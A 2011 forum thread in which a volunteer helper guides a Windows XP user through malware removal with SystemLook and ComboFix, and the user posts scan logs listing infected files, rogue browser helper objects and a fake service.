0x82804E7A Unknown thread object [ ETHREAD 0x827BD260 ] TID: 144, 600 bytes
0x82807008 Unknown thread object [ ETHREAD 0x82789020 ] TID: 148, 600 bytes
0x82806CDC Unknown page with executable code, 804 bytes
ard
Regular Member
 
Posts: 41
Joined: August 25th, 2009, 7:12 am

Re: redirected searches and email problems

Unread postby melboy » June 12th, 2011, 3:49 am

Hi


It looks like we've indentified the culprit.



SystemLook

Please download SystemLook from one of the links below and save it to your Desktop.

Download Mirror #1
Download Mirror #2


  • Double-click SystemLook.exe to run it.
  • Copy the content of the following codebox into the main textfield:
    Code: Select all
    :filefind
    volsnap.* 
  • Click the Look button to start the scan.
  • When finished, a notepad window will open with the results of the scan. Please post this log in your next reply.
Note: The log can also be found on your Desktop entitled SystemLook.txt
User avatar
melboy
MRU Expert
MRU Expert
 
Posts: 3670
Joined: July 25th, 2008, 4:25 pm
Location: UK

Re: redirected searches and email problems

Unread postby ard » June 12th, 2011, 9:08 am

Hi -

I ran SystemLook - results below.

SystemLook 04.09.10 by jpshortstuff
Log created at 08:50 on 12/06/2011 by admin
Administrator - Elevation successful

========== filefind ==========

Searching for "volsnap.* "
C:\i386\volsnap.inf --a---- 1095 bytes [11:28 02/08/2005] [10:00 04/08/2004] 1C43F4D998567C9D2463E18669F33A3C
C:\i386\volsnap.sys --a---- 52352 bytes [11:32 02/08/2005] [10:00 04/08/2004] EE4660083DEBA849FF6C485D944B379B
C:\WINDOWS\inf\volsnap.inf --a---- 1095 bytes [17:51 10/08/2004] [10:00 04/08/2004] 1C43F4D998567C9D2463E18669F33A3C
C:\WINDOWS\inf\volsnap.PNF --a---- 4964 bytes [20:37 15/07/2005] [20:37 15/07/2005] 27C1FA3BF24995D0C1B24299E953820C
C:\WINDOWS\ServicePackFiles\i386\volsnap.sys ------- 52352 bytes [06:42 15/08/2009] [04:11 14/04/2008] 4C8FCB5CC53AAB716D810740FE59D025
C:\WINDOWS\SoftwareDistribution\Download\e9500597a78495f397efb821e37bf356\volsnap.sys --a---- 52352 bytes [18:41 13/04/2008] [18:41 13/04/2008] 4C8FCB5CC53AAB716D810740FE59D025
C:\WINDOWS\system32\drivers\volsnap.sys --a---- 52352 bytes [04:39 15/08/2009] [04:11 14/04/2008] 4C8FCB5CC53AAB716D810740FE59D025

-= EOF =-
ard
Regular Member
 
Posts: 41
Joined: August 25th, 2009, 7:12 am

Re: redirected searches and email problems

Unread postby melboy » June 12th, 2011, 2:41 pm

Hi

Good. Please initiate yourself with the running of Combofix. Combofix may find rootkit activity & require your computer to be rebooted - maybe more than once.

Above all, please be patient and let combofix run it's course.


ComboFix (by sUBs)

Please visit this webpage for instructions for downloading and running ComboFix: Bleeping Computer ComboFix Tutorial

  • You must download it to and run it from your Desktop
  • Now STOP all your security applications (Antivirus/Antispyware, Guards and Shields) as they could easily interfere with ComboFix.
    For instructions on how to disable your security programs, please see this topic:
    How to disable your security applications
  • Double click combofix.exe & follow the prompts.
  • When finished, it will produce a log. Please save that log to post in your next reply
  • Re-enable all the programs that were disabled during the running of ComboFix..


A word of warning: This tool is not for everyday use. ComboFix SHOULD NOT be used unless requested by a forum helper
Neither I nor sUBs are responsible for any damage you may have caused your machine by running ComboFix on your own.
User avatar
melboy
MRU Expert
MRU Expert
 
Posts: 3670
Joined: July 25th, 2008, 4:25 pm
Location: UK

Re: redirected searches and email problems

Unread postby ard » June 13th, 2011, 2:34 am

Hi -

I an ComboFix as requested - the log file is attached.


ComboFix 11-06-12.03 - admin 06/13/2011 1:51.3.1 - x86
Microsoft Windows XP Home Edition 5.1.2600.3.1252.1.1033.18.510.264 [GMT -4:00]
Running from: c:\documents and settings\admin\Desktop\ComboFix.exe
.
ADS - WINDOWS: deleted 128 bytes in 1 streams.
.
((((((((((((((((((((((((((((((((((((((( Other Deletions )))))))))))))))))))))))))))))))))))))))))))))))))
.
.
c:\biblespeak\BibleSpeak.exe
c:\documents and settings\admin\0.15188298399276234.exe
c:\documents and settings\admin\Local Settings\Application Data\{C3DF0D32-A46E-45E1-AB4D-77017415DDFD}
c:\documents and settings\admin\Local Settings\Application Data\{C3DF0D32-A46E-45E1-AB4D-77017415DDFD}\chrome.manifest
c:\documents and settings\admin\Local Settings\Application Data\{C3DF0D32-A46E-45E1-AB4D-77017415DDFD}\chrome\content\_cfg.js
c:\documents and settings\admin\Local Settings\Application Data\{C3DF0D32-A46E-45E1-AB4D-77017415DDFD}\chrome\content\overlay.xul
c:\documents and settings\admin\Local Settings\Application Data\{C3DF0D32-A46E-45E1-AB4D-77017415DDFD}\install.rdf
c:\documents and settings\admin\WINDOWS
c:\documents and settings\All Users\Application Data\Tarma Installer
c:\documents and settings\All Users\Application Data\Tarma Installer\{00270290-9BD5-47DB-BAA4-42BE74F16B42}\_Setup.dll
c:\documents and settings\All Users\Application Data\Tarma Installer\{00270290-9BD5-47DB-BAA4-42BE74F16B42}\Setup.dat
c:\documents and settings\All Users\Application Data\Tarma Installer\{00270290-9BD5-47DB-BAA4-42BE74F16B42}\Setup.exe
c:\documents and settings\All Users\Application Data\Tarma Installer\{00270290-9BD5-47DB-BAA4-42BE74F16B42}\Setup.ico
c:\documents and settings\LocalService\Application Data\02000000f71535641270C.manifest
c:\documents and settings\LocalService\Application Data\02000000f71535641270O.manifest
c:\documents and settings\LocalService\Application Data\02000000f71535641270P.manifest
c:\documents and settings\LocalService\Application Data\02000000f71535641270S.manifest
c:\windows\ST6UNST.000
c:\windows\stic1690.exe
c:\windows\system32\ativtmxx32.dll
c:\windows\system32\ESQULzxspectrum
c:\windows\system32\GoogleToolbarInstaller_en.exe
.
Infected copy of c:\windows\system32\drivers\volsnap.sys was found and disinfected
Restored copy from - Kitty had a snack :p
.
((((((((((((((((((((((((( Files Created from 2011-05-13 to 2011-06-13 )))))))))))))))))))))))))))))))
.
.
2011-06-10 13:07 . 2011-06-12 12:59 -------- d-----w- C:\@malware
2011-06-10 13:07 . 2011-06-10 13:07 0 ---ha-w- c:\documents and settings\admin\aarexiymqh.tmp
2011-06-10 04:29 . 2011-06-10 04:29 785920 ----a-w- c:\windows\system32\bad ils32.exe
2011-06-10 04:29 . 2011-06-10 04:29 168960 ----a-w- c:\windows\system32\bad kbdycl32.dll
2011-06-10 04:29 . 2011-06-10 04:29 785920 ----a-w- c:\windows\system32\bad dfshim32.exe
2011-06-10 04:29 . 2011-06-10 04:29 359424 ----a-w- c:\windows\system32\bad ativtmxx32.dll
2011-06-07 11:47 . 2011-06-07 11:47 -------- d-----w- c:\documents and settings\admin\Application Data\AVG10
2011-06-07 11:36 . 2011-06-07 11:36 -------- d--h--w- c:\documents and settings\All Users\Application Data\Common Files
2011-06-07 11:32 . 2011-06-08 14:00 -------- d-----w- c:\documents and settings\All Users\Application Data\AVG10
2011-06-07 11:32 . 2011-06-08 13:58 -------- d-----w- c:\windows\system32\drivers\AVG
2011-06-07 11:31 . 2011-06-07 11:31 -------- d-----w- c:\program files\AVG
2011-06-07 11:24 . 2011-06-08 13:59 -------- d-----w- c:\documents and settings\All Users\Application Data\MFAData
2011-06-06 17:09 . 2011-06-08 14:17 -------- d-----w- c:\documents and settings\All Users\Application Data\AVAST Software
2011-06-06 17:09 . 2011-06-06 17:09 -------- d-----w- c:\program files\AVAST Software
2011-06-06 16:57 . 2011-06-06 17:04 -------- d-----w- c:\program files\SpywareBlaster
2011-06-05 13:16 . 2011-06-05 13:16 -------- d-----w- c:\documents and settings\All Users\Application Data\SUPERAntiSpyware.com
2011-06-05 13:16 . 2011-06-05 13:16 -------- d-----w- c:\documents and settings\admin\Application Data\SUPERAntiSpyware.com
2011-06-05 13:15 . 2011-06-05 13:16 -------- d-----w- c:\program files\SUPERAntiSpyware
2011-06-05 07:45 . 2011-06-06 04:57 -------- d-----w- c:\program files\Spybot - Search & Destroy
2011-06-04 16:32 . 2011-06-04 16:32 -------- d-----w- c:\program files\Watchtower
2011-06-04 15:19 . 2011-06-04 15:19 -------- d-----w- c:\windows\system32\wbem\Repository
2011-06-04 14:15 . 2011-06-04 18:56 -------- d-----w- C:\- PDF docs
2011-06-04 14:15 . 2011-06-04 15:15 -------- d-----w- C:\- maps
2011-06-04 13:55 . 2011-06-04 14:04 -------- d-----w- C:\- JW info
2011-06-04 13:55 . 2011-06-04 18:55 -------- d-----w- C:\- money
2011-06-04 13:55 . 2011-06-04 13:55 -------- d-----w- C:\- bank
2011-06-04 13:55 . 2011-06-04 18:57 -------- d-----w- C:\- XL docs
2011-06-04 13:55 . 2011-06-04 19:28 -------- d-----w- C:\- word docs
2011-06-04 13:54 . 2011-06-04 18:51 -------- d-----w- C:\- sounds
2011-06-04 13:53 . 2011-06-04 19:07 -------- d-----w- C:\- powerpoint
2011-05-16 13:45 . 2011-05-16 13:45 7040 ----a-w- c:\windows\system32\sabprocenum.sys
.
.
.
(((((((((((((((((((((((((((((((((((((((( Find3M Report ))))))))))))))))))))))))))))))))))))))))))))))))))))
.
2011-06-04 16:09 . 2011-03-22 17:14 107 ----a-w- c:\documents and settings\admin\Application Data\netstat.bat
2011-05-29 13:11 . 2009-09-04 13:59 39984 ----a-w- c:\windows\system32\drivers\mbamswissarmy.sys
.
.
((((((((((((((((((((((((((((((((((((( Reg Loading Points ))))))))))))))))))))))))))))))))))))))))))))))))))
.
.
*Note* empty entries & legit default entries are not shown
REGEDIT4
.
[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Toolbar\Webbrowser]
"{A1E75A0E-4397-4BA8-BB50-E19FB66890F4}"= "c:\program files\MyAshampoo\tbMyA1.dll" [2010-08-21 2734688]
.
[HKEY_CLASSES_ROOT\clsid\{a1e75a0e-4397-4ba8-bb50-e19fb66890f4}]
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\policies\system]
"HideShutdownScripts"= 0 (0x0)
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\policies\explorer]
"NoResolveTrack"= 0 (0x0)
"NoFileAssociate"= 0 (0x0)
.
[hkey_local_machine\software\microsoft\windows\currentversion\explorer\ShellExecuteHooks]
"{5AE067D3-9AFB-48E0-853A-EBB7F4A000DA}"= "c:\program files\SUPERAntiSpyware\SASSEH.DLL" [2008-05-13 77824]
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows nt\currentversion\winlogon\notify\!SASWinLogon]
2009-09-03 22:21 548352 ----a-w- c:\program files\SUPERAntiSpyware\SASWINLO.DLL
.
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\Wdf01000.sys]
@="Driver"
.
[HKLM\~\startupfolder\C:^Documents and Settings^All Users^Start Menu^Programs^Startup^PolderbitS Audio Driver Monitor.lnk]
backup=c:\windows\pss\PolderbitS Audio Driver Monitor.lnkCommon Startup
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\cdloader]
2010-12-03 12:39 50592 ----a-w- c:\documents and settings\admin\Application Data\mjusbsp\cdloader2.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\ctfmon.exe]
2008-04-14 09:42 15360 ------w- c:\windows\system32\ctfmon.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\QuickTime Task]
2010-02-15 23:50 417792 ----a-w- c:\program files\QuickTime\QTTask.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\SpybotSD TeaTimer]
2009-03-05 20:07 2260480 --sha-w- c:\program files\Spybot - Search & Destroy\TeaTimer.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\SUPERAntiSpyware]
2011-05-23 15:00 2424192 ----a-w- c:\program files\SUPERAntiSpyware\SUPERAntiSpyware.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\TkBellExe]
2010-10-02 15:51 202256 ----a-w- c:\program files\Common Files\Real\Update_OB\realsched.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\services]
"LiveUpdate Notice Service"=3 (0x3)
"LiveUpdate Notice Ex"=3 (0x3)
"LiveUpdate"=3 (0x3)
"Automatic LiveUpdate Scheduler"=2 (0x2)
"AntiVirService"=2 (0x2)
"AntiVirSchedulerService"=2 (0x2)
"wuauserv"=2 (0x2)
"SBAMSvc"=2 (0x2)
"Browser Defender Update Service"=2 (0x2)
"avast! Antivirus"=2 (0x2)
"WMPNetworkSvc"=3 (0x3)
"VSS"=3 (0x3)
"SysmonLog"=3 (0x3)
"ose"=3 (0x3)
"odserv"=3 (0x3)
"nlsX86cc"=2 (0x2)
"idsvc"=3 (0x3)
"gupdatem"=3 (0x3)
"gupdate"=2 (0x2)
"DfSdkS"=3 (0x3)
"Apple Mobile Device"=3 (0x3)
"SBPIMSvc"=2 (0x2)
.
[HKEY_LOCAL_MACHINE\software\microsoft\security center\Monitoring]
"DisableMonitoring"=dword:00000001
.
[HKEY_LOCAL_MACHINE\software\microsoft\security center\Monitoring\SymantecAntiVirus]
"DisableMonitoring"=dword:00000001
.
[HKEY_LOCAL_MACHINE\software\microsoft\security center\Monitoring\SymantecFirewall]
"DisableMonitoring"=dword:00000001
.
[HKLM\~\services\sharedaccess\parameters\firewallpolicy\standardprofile\AuthorizedApplications\List]
"c:\\WINDOWS\\system32\\sessmgr.exe"=
"c:\\Program Files\\Skype\\Plugin Manager\\skypePM.exe"=
"c:\\Program Files\\Skype\\Phone\\Skype.exe"=
"c:\\mjusbsp\\magicJack.exe"=
"c:\\Program Files\\Parsons\\QuickVerse\\QuickVerse\\qvwin.exe"=
"c:\\Documents and Settings\\admin\\Application Data\\mjusbsp\\magicJack.exe"=
.
[HKLM\~\services\sharedaccess\parameters\firewallpolicy\standardprofile\GloballyOpenPorts\List]
"5060:UDP"= 5060:UDP:UDP
"5070:UDP"= 5070:UDP:UDP
"49152:UDP"= 49152:UDP:UDP
"65535:UDP"= 65535:UDP:UDP
"443:TCP"= 443:TCP:TCP
.
R1 SASDIFSV;SASDIFSV;c:\program files\SUPERAntiSpyware\sasdifsv.sys [2/17/2010 2:25 PM 12872]
R1 SASKUTIL;SASKUTIL;c:\program files\SUPERAntiSpyware\SASKUTIL.SYS [5/10/2010 2:41 PM 67656]
R3 CAM1690;USB PC Camera;c:\windows\system32\drivers\cam1690.sys [9/20/2007 6:03 PM 181888]
R3 PbsAuDrv;PolderbitS Audio Driver;c:\windows\system32\drivers\pbsaudrv.sys [8/1/2009 1:17 PM 110752]
R3 RRNetCapMP;RRNetCapMP;c:\windows\system32\drivers\rrnetcap.sys [1/6/2010 4:16 PM 27168]
S2 MBAMService;MBAMService;c:\program files\Malwarebytes' Anti-Malware\mbamservice.exe [9/4/2009 9:59 AM 366640]
S2 SamSs32;Security Accounts Manager ;c:\windows\system32\dfshim32.exe --> c:\windows\system32\dfshim32.exe [?]
S3 ADM8511;ADMtek ADM8511/AN986 USB To Fast Ethernet Converter;c:\windows\system32\drivers\ADM8511.SYS [7/26/2005 6:19 PM 20160]
S3 cpuz130;cpuz130;\??\c:\docume~1\admin\LOCALS~1\Temp\cpuz130\cpuz_x32.sys --> c:\docume~1\admin\LOCALS~1\Temp\cpuz130\cpuz_x32.sys [?]
S3 ionwpvvc;Watchport/V2 USB Camera;c:\windows\system32\drivers\ionwpvvc.sys [2/20/2008 4:50 PM 38656]
S3 MBAMProtector;MBAMProtector;\??\c:\windows\system32\drivers\mbam.sys --> c:\windows\system32\drivers\mbam.sys [?]
S3 MBAMSwissArmy;MBAMSwissArmy;c:\windows\system32\drivers\mbamswissarmy.sys [9/4/2009 9:59 AM 39984]
S3 nosGetPlusHelper;getPlus(R) Helper 3004;c:\windows\System32\svchost.exe -k nosGetPlusHelper [8/15/2009 12:39 AM 14336]
S3 RRNetCap;RRNetCap Service;c:\windows\system32\drivers\rrnetcap.sys [1/6/2010 4:16 PM 27168]
S4 Compass Server;Compass Server; [x]
S4 DfSdkS;Defragmentation-Service;c:\program files\Ashampoo\Ashampoo WinOptimizer 7\DfSdkS.exe [4/13/2011 1:16 PM 406016]
S4 gupdate;Google Update Service (gupdate);c:\program files\Google\Update\GoogleUpdate.exe [10/19/2010 10:04 AM 136176]
S4 gupdatem;Google Update Service (gupdatem);c:\program files\Google\Update\GoogleUpdate.exe [10/19/2010 10:04 AM 136176]
S4 magicJack;magicJack;c:\mjusbsp\srvany.exe [2/27/2011 5:32 PM 8192]
S4 nlsX86cc;NLS Service;c:\windows\system32\NLSSRV32.EXE --> c:\windows\system32\NLSSRV32.EXE [?]
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows nt\currentversion\svchost]
getPlusHelper REG_MULTI_SZ getPlusHelper
nosGetPlusHelper REG_MULTI_SZ nosGetPlusHelper
.
Contents of the 'Scheduled Tasks' folder
.
2011-06-07 c:\windows\Tasks\GoogleUpdateTaskMachineCore.job
- c:\program files\Google\Update\GoogleUpdate.exe [2010-10-19 14:04]
.
.
------- Supplementary Scan -------
.
uStart Page = hxxp://www.google.com/
uSearchMigratedDefaultURL = hxxp://www.google.com/search?q={searchTerms}&sourceid=ie7&rls=com.microsoft:en-US&ie=utf8&oe=utf8
uInternet Connection Wizard,ShellNext = iexplore
uSearchURL,(Default) = hxxp://www.google.com/search?q=%s
Trusted Zone: magicjack.com\my
Trusted Zone: talk4free.com\reg
TCP: DhcpNameServer = 192.168.0.1
TCP: Interfaces\{F1AACA3A-E5BE-452E-9F2E-0E4D30CBE236}: NameServer = 67.90.152.122,67.107.71.186
.
- - - - ORPHANS REMOVED - - - -
.
BHO-{1022D5BC-11EA-4BBF-8735-DBD28E5359Bc} - c:\windows\system32\ativtmxx32.dll
BHO-{17CC8F5E-78E0-AD0B-6459-5D135F28F580} - c:\windows\system32\kbdycl32.dll
BHO-{2045AB79-11EA-4BBF-8735-DBD28E5359Bc} - c:\windows\system32\ativtmxx32.dll
Toolbar-Locked - (no file)
Toolbar-{CCC7A320-B3CA-4199-B1A6-9F516DD69829} - (no file)
WebBrowser-{D4027C7F-154A-4066-A1AD-4243D8127440} - (no file)
WebBrowser-{CCC7A320-B3CA-4199-B1A6-9F516DD69829} - (no file)
MSConfigStartUp-Adobe ARM - c:\program files\Common Files\Adobe\ARM\1.0\AdobeARM.exe
MSConfigStartUp-Adobe Reader Speed Launcher - c:\program files\Adobe\Reader 9.0\Reader\Reader_sl.exe
MSConfigStartUp-AVG_TRAY - c:\program files\AVG\AVG10\avgtray.exe
MSConfigStartUp-DriverScanner - c:\program files\Uniblue\DriverScanner\launcher.exe
MSConfigStartUp-ISTray - c:\program files\Spyware Doctor\pctsTray.exe
MSConfigStartUp-SBAMTray - c:\program files\Sunbelt Software\VIPRE\SBAMTray.exe
AddRemove-ISA_CLV_module - c:\docume~1\ALLUSE~1\APPLIC~1\TARMAI~1\{00270~1\Setup.exe
.
.
.
**************************************************************************
.
catchme 0.3.1398 W2K/XP/Vista - rootkit/stealth malware detector by Gmer, http://www.gmer.net
Rootkit scan 2011-06-13 02:00
Windows 5.1.2600 Service Pack 3 NTFS
.
scanning hidden processes ...
.
scanning hidden autostart entries ...
.
scanning hidden files ...
.
scan completed successfully
hidden files: 0
.
**************************************************************************
.
[HKEY_LOCAL_MACHINE\System\ControlSet009\Services\ASFWHide]
"ImagePath"="\??\c:\docume~1\admin\LOCALS~1\Temp\ASFWHide"
.
--------------------- LOCKED REGISTRY KEYS ---------------------
.
[HKEY_USERS\S-1-5-21-3277941142-1728969546-3919492650-1006\Software\Microsoft\SystemCertificates\AddressBook*]
@Allowed: (Read) (RestrictedCode)
@Allowed: (Read) (RestrictedCode)
.
[HKEY_USERS\S-1-5-21-3277941142-1728969546-3919492650-1006\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Approved\{2B8DA90D-0FD0-9EC6-D03B-B72F1EA63631}*]
@Allowed: (Read) (RestrictedCode)
@Allowed: (Read) (RestrictedCode)
.
[HKEY_USERS\S-1-5-21-3277941142-1728969546-3919492650-1006\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Approved\{701AE01E-57DC-62B6-726A-E623E013E9AB}*]
@Allowed: (Read) (RestrictedCode)
@Allowed: (Read) (RestrictedCode)
"oaofebfcooaennmldimllfnpkdeddk"=hex:64,61,6c,6c,6c,6f,68,6b,00,85
"oakeeiafbknjlbdpdmhbjhfdcampmp"=hex:6a,61,6c,6c,61,70,63,6a,65,70,70,6b,6e,61,
64,66,67,6d,6c,6b,00,0f
"naafkghclfiefjbaphoacnjbhlmk"=hex:6a,61,6f,6c,70,6f,63,6b,70,67,67,69,70,65,
67,67,63,64,67,65,00,07
.
--------------------- DLLs Loaded Under Running Processes ---------------------
.
- - - - - - - > 'winlogon.exe'(912)
c:\program files\SUPERAntiSpyware\SASWINLO.DLL
c:\windows\system32\WININET.dll
.
Completion time: 2011-06-13 02:03:33
ComboFix-quarantined-files.txt 2011-06-13 06:03
.
Pre-Run: 58,284,859,392 bytes free
Post-Run: 58,400,997,376 bytes free
.
WindowsXP-KB310994-SP2-Home-BootDisk-ENU.exe
[boot loader]
timeout=2
default=multi(0)disk(0)rdisk(0)partition(2)\WINDOWS
[operating systems]
c:\cmdcons\BOOTSECT.DAT="Microsoft Windows Recovery Console" /cmdcons
UnsupportedDebug="do not select this" /debug
multi(0)disk(0)rdisk(0)partition(2)\WINDOWS="Microsoft Windows XP Home Edition" /noexecute=optin /fastdetect
.
Current=9 Default=9 Failed=8 LastKnownGood=10 Sets=1,2,3,4,5,6,7,8,9,10
- - End Of File - - 7F68AA6BFA265A3A290E8984086C5C14
ard
Regular Member
 
Posts: 41
Joined: August 25th, 2009, 7:12 am

Re: redirected searches and email problems

Unread postby melboy » June 13th, 2011, 2:46 pm

Hi

A few questions for you to answer please.

Hows the computer running? Have the redirects stopped?

Did you create this folder on your C: drive?
C:\@malware

After running the CFscript below, please navigate to the Qoobox folder at the root of you C: drive and post the contents of ComboFix-quarantined-files.txt , along with the resulting combofix.txt
(C:\Qoobox\ComboFix-quarantined-files.txt)



COMBOFIX-Script

A word of warning: Please do not run ComboFix on your own. This tool is not a toy and not for everyday use.

If combofix prompts you that an update is available, please allow it to update.


  • Please open Notepad (Start -> Run -> type notepad in the Open field -> OK) and copy and paste the text present inside the code box below:

    Code: Select all
    File:: 
    c:\documents and settings\admin\aarexiymqh.tmp
    c:\windows\system32\bad ils32.exe
    c:\windows\system32\bad kbdycl32.dll
    c:\windows\system32\bad dfshim32.exe
    c:\windows\system32\bad ativtmxx32.dll
    
    DirLook::
    C:\@malware
    
    Driver:: 
    SamSs32
    
    Regnull::
    [HKEY_USERS\S-1-5-21-3277941142-1728969546-3919492650-1006\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Approved\{2B8DA90D-0FD0-9EC6-D03B-B72F1EA63631}*]
    [HKEY_USERS\S-1-5-21-3277941142-1728969546-3919492650-1006\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Approved\{701AE01E-57DC-62B6-726A-E623E013E9AB}*]
    

  • Save this as CFScript.txt and change the "Save as type" to "All Files" and place it on your desktop.

    Image
  • Very Important! Temporarily disable your anti-virus, script blocking and any anti-malware real-time protection before following the steps below. They can interfere with ComboFix or remove some of its embedded files which may cause "unpredictable results".
  • If you need help to disable your protection programs see here.
  • Referring to the screenshot above, drag CFScript.txt into ComboFix.exe.
  • ComboFix will now run a scan on your system. It may reboot your system when it finishes. This is normal.
  • When finished, it shall produce a log for you. Copy and paste the contents of the log in your next reply.

CAUTION: Do not mouse-click ComboFix's window while it is running. That may cause it to stall.
User avatar
melboy
MRU Expert
MRU Expert
 
Posts: 3670
Joined: July 25th, 2008, 4:25 pm
Location: UK

Re: redirected searches and email problems

Unread postby ard » June 13th, 2011, 5:49 pm

Hi –

question - 1
The computer runs OK for the most part. Almost every email is preceeded by a box saying –
c:documents and settings\dadmin\desktop
_________________________________________________________________
| flash required for this application x |
|--------------------------------------------------------------------------------------|
| Your browser must have Flash 9.0 or higher installed to add this |
| application. You can download and install the latest Flash Player |
| here |
| |
| OK |
|______________________________________________________________|


The email display is very slow to display.



question - 2

I created the directory c:\@malware to hold the anti-malware exe’s and logs so they wouldn’t be lost to me.

I also added the (bad ) prefix to these files because they kept trying to run in the taskmanager - that was before I talked with you

c:\windows\system32\bad ils32.exe
c:\windows\system32\bad kbdycl32.dll
c:\windows\system32\bad dfshim32.exe
c:\windows\system32\bad ativtmxx32.dll


number - 3

I ran ComboFix. During stage 2 or 3 xp showed a box - PEV.exe has encountered a problem and must close. etc. etc.etc. send report or don’t send

I did nothing.



LOG.TXT

ComboFix 11-06-13.01 - admin 06/13/2011 16:51:44.4.1 - x86
Microsoft Windows XP Home Edition 5.1.2600.3.1252.1.1033.18.510.282 [GMT -4:00]
Running from: c:\documents and settings\admin\Desktop\ComboFix.exe
Command switches used :: c:\documents and settings\admin\Desktop\CFScript.txt
AV: AntiVir Desktop *Disabled/Updated* {AD166499-45F9-482A-A743-FDD3350758C7}
.
FILE ::
"c:\documents and settings\admin\aarexiymqh.tmp"
"c:\windows\system32\bad ativtmxx32.dll"
"c:\windows\system32\bad dfshim32.exe"
"c:\windows\system32\bad ils32.exe"
"c:\windows\system32\bad kbdycl32.dll"
.
.
((((((((((((((((((((((((((((((((((((((( Other Deletions )))))))))))))))))))))))))))))))))))))))))))))))))
.
.
c:\documents and settings\admin\aarexiymqh.tmp
c:\windows\system32\bad ativtmxx32.dll
c:\windows\system32\bad dfshim32.exe
c:\windows\system32\bad ils32.exe
c:\windows\system32\bad kbdycl32.dll
.
.
((((((((((((((((((((((((((((((((((((((( Drivers/Services )))))))))))))))))))))))))))))))))))))))))))))))))
.
.
-------\Legacy_SAMSS32
-------\Service_SamSs32
.
.
((((((((((((((((((((((((( Files Created from 2011-05-13 to 2011-06-13 )))))))))))))))))))))))))))))))
.
.
2011-06-13 06:11 . 2011-06-13 06:11 -------- d-----w- c:\documents and settings\All Users\Application Data\Avira
2011-06-13 06:11 . 2011-04-01 21:07 61960 ----a-w- c:\windows\system32\drivers\avgntflt.sys
2011-06-13 06:11 . 2011-04-01 21:07 137656 ----a-w- c:\windows\system32\drivers\avipbb.sys
2011-06-13 06:11 . 2010-06-17 19:27 45416 ----a-w- c:\windows\system32\drivers\avgntdd.sys
2011-06-13 06:11 . 2010-06-17 19:27 22360 ----a-w- c:\windows\system32\drivers\avgntmgr.sys
2011-06-10 13:07 . 2011-06-13 20:44 -------- d-----w- C:\@malware
2011-06-07 11:47 . 2011-06-07 11:47 -------- d-----w- c:\documents and settings\admin\Application Data\AVG10
2011-06-07 11:36 . 2011-06-07 11:36 -------- d--h--w- c:\documents and settings\All Users\Application Data\Common Files
2011-06-07 11:32 . 2011-06-08 14:00 -------- d-----w- c:\documents and settings\All Users\Application Data\AVG10
2011-06-07 11:32 . 2011-06-08 13:58 -------- d-----w- c:\windows\system32\drivers\AVG
2011-06-07 11:31 . 2011-06-07 11:31 -------- d-----w- c:\program files\AVG
2011-06-07 11:24 . 2011-06-08 13:59 -------- d-----w- c:\documents and settings\All Users\Application Data\MFAData
2011-06-06 17:09 . 2011-06-08 14:17 -------- d-----w- c:\documents and settings\All Users\Application Data\AVAST Software
2011-06-06 17:09 . 2011-06-06 17:09 -------- d-----w- c:\program files\AVAST Software
2011-06-06 16:57 . 2011-06-06 17:04 -------- d-----w- c:\program files\SpywareBlaster
2011-06-05 13:16 . 2011-06-05 13:16 -------- d-----w- c:\documents and settings\All Users\Application Data\SUPERAntiSpyware.com
2011-06-05 13:16 . 2011-06-05 13:16 -------- d-----w- c:\documents and settings\admin\Application Data\SUPERAntiSpyware.com
2011-06-05 13:15 . 2011-06-05 13:16 -------- d-----w- c:\program files\SUPERAntiSpyware
2011-06-05 07:45 . 2011-06-06 04:57 -------- d-----w- c:\program files\Spybot - Search & Destroy
2011-06-04 16:32 . 2011-06-04 16:32 -------- d-----w- c:\program files\Watchtower
2011-06-04 15:19 . 2011-06-04 15:19 -------- d-----w- c:\windows\system32\wbem\Repository
2011-06-04 14:15 . 2011-06-04 18:56 -------- d-----w- C:\- PDF docs
2011-06-04 14:15 . 2011-06-04 15:15 -------- d-----w- C:\- maps
2011-06-04 13:55 . 2011-06-04 14:04 -------- d-----w- C:\- JW info
2011-06-04 13:55 . 2011-06-04 18:55 -------- d-----w- C:\- money
2011-06-04 13:55 . 2011-06-04 13:55 -------- d-----w- C:\- bank
2011-06-04 13:55 . 2011-06-04 18:57 -------- d-----w- C:\- XL docs
2011-06-04 13:55 . 2011-06-04 19:28 -------- d-----w- C:\- word docs
2011-06-04 13:54 . 2011-06-04 18:51 -------- d-----w- C:\- sounds
2011-06-04 13:53 . 2011-06-04 19:07 -------- d-----w- C:\- powerpoint
2011-05-16 13:45 . 2011-05-16 13:45 7040 ----a-w- c:\windows\system32\sabprocenum.sys
.
.
.
(((((((((((((((((((((((((((((((((((((((( Find3M Report ))))))))))))))))))))))))))))))))))))))))))))))))))))
.
2011-06-04 16:09 . 2011-03-22 17:14 107 ----a-w- c:\documents and settings\admin\Application Data\netstat.bat
2011-05-29 13:11 . 2009-09-04 13:59 39984 ----a-w- c:\windows\system32\drivers\mbamswissarmy.sys
.
.
(((((((((((((((((((((((((((((((((((((((((((( Look )))))))))))))))))))))))))))))))))))))))))))))))))))))))))
.
---- Directory of C:\@malware ----
.
2011-06-13 06:16 . 2011-06-13 05:45 4121087 ----a-r- c:\@malware\ComboFix.exe
2011-06-13 06:08 . 2011-06-13 06:08 16150 ----a-w- c:\@malware\log.txt
2011-06-13 05:42 . 2011-06-13 05:42 86 ----a-w- c:\@malware\catchme.log
2011-06-13 05:28 . 2011-06-13 05:28 52676424 ----a-w- c:\@malware\avira_antivir_personal_en.exe
